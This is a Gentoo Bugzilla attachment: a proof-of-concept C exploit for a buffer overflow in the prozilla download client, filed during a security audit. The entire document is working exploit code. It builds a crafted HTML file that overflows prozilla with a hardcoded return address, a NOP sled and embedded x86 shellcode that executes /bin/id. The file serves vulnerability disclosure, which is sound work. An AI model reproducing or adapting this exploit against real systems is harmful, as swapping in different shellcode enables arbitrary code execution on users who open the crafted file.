Gentoo's Bugzilla – Attachment 67521 Details for Bug 70090
www-client/prozilla: multiple vulnerabilities -> Remove from tree
prozilla poc
exploit.c (text/plain), 1.25 KB, created by Tavis Ormandy (RETIRED) on 2005-09-02 16:49:14 UTC
>#include <stdio.h>
>#include <string.h>
>#include <stdlib.h>
>
>#define OVERFLOW (1<<10)+32
>#define SLEDSIZ (1<<10)
>#define RETADDR 0x806977a+SLEDSIZ/2
>#define OUTPUT "AdvResults.asp"
>
>/*
> * prozilla bug, found while auditing for gentoo bug #70090
> * -taviso@gentoo.org
> */
>
>/* execve() /bin/id */
>unsigned char shellcode[] =
>"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
>"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
>"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
>"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
>"\x9f\xcf\x2d\x8e";
>
>int main(int argc, char **argv)
>{
>    unsigned char *buf;
>    void *ret = (void *) RETADDR;
>    FILE *exploit;
>    int i;
>
>    exploit = fopen(OUTPUT, "w");
>    fprintf(exploit, "<PRE><A HREF=>");
>
>    buf = malloc(OVERFLOW);
>    for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
>        memcpy(buf + i, &ret, sizeof(void *));
>    fwrite(buf, OVERFLOW, 1, exploit);
>    fprintf(exploit, "</A><A HREF=></A><A HREF=></A></PRE>");
>    buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
>    memset(buf, 0x90, SLEDSIZ);
>    memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
>    fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
>    free(buf);
>    fprintf(stderr, "[*] %s created.\n", OUTPUT);
>    return 0;
>}